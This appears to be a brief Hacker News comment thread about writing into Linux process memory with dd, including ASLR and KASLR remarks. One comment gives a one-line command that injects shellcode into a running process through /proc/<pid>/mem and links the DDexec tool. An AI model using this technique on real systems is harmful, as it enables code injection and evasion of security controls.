upvote

points

by dominicq6 hours ago |
comments
upvoteby PhilipRoman5 hours ago|
next
[-]
If you have /proc available, you don't even need to disable ASLR (all mappings are available to you)
reply
upvoteby stackghost6 hours ago|
prev|
[-]
Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.
reply
upvoteby dominicq6 hours ago|
parent|
[-]
:(

Sounds super 1337 and I hope it's actually possible somehow.

reply
upvoteby aa-jv5 hours ago|
parent|
[-]
Parse /proc/<pid>/maps to find the relevant target_addr in your process-under-attack. And then its a matter of:

    $ dd if=shellcode.bin of=/proc/<pid>/mem bs=1 seek=$((target_addr)) ...
See also: DDExec

https://github.com/arget13/DDexec

reply